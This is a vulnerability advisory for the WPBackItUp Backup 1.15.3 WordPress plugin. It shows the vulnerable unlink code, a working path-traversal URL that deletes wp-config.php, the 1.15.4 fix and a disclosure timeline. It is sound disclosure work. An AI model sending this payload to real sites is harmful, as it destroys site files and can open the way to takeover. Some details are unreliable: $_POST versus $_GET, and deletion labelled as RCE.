Plugin WPBackItUp Backup 1.15.3 – RCE – Unlink

Details

  • Name : WPBackItUp Backup
  • Version : 1.15.3
  • Homepage : https://wordpress.org/plugins/wp-backitup/

Type

  • Remote Code Execution - RCE
  • Vulnerabilities discovered

Description

  • Type user access: administrator user.
  • $_POST[‘delete_log’] is not escaped.

Code

File: wp-content/plugins/wp-backitup/views/support.php
Line: 335 - 343

private function delete_action() {
 $filename = WPBACKITUP__LOGS_PATH . '/' . $_GET['delete_log'];
 if ( file_exists( $filename ) ) {
 unlink( $filename );
 }
}

Proof Concept

  1. Log in with administrator user.
  2. Access url:
    1. http://target/wp-admin/admin.php?page=wp-backitup-support&delete_log=..%2F..%2F..%2F..%2Fwp-config.php

Results

wp-config deleted and restart system.

Note


Solution

https://wordpress.org/plugins/wp-backitup/#developers

1.15.4

*Release Date – January 3, 2018
  • FIX : Fix security issue with delete log
  • UPDATE: Admin notice updates
  • UPDATE: Enhancements to support WPBackItUp Safe cloud storage

Timeline

  • Date Discovery : 11/28/2017
  • Date Vendor Contact : 12/26/2017
  • Date Publish : 01/04/2018
  • Date Resolution : 01/03/2018

Back to Top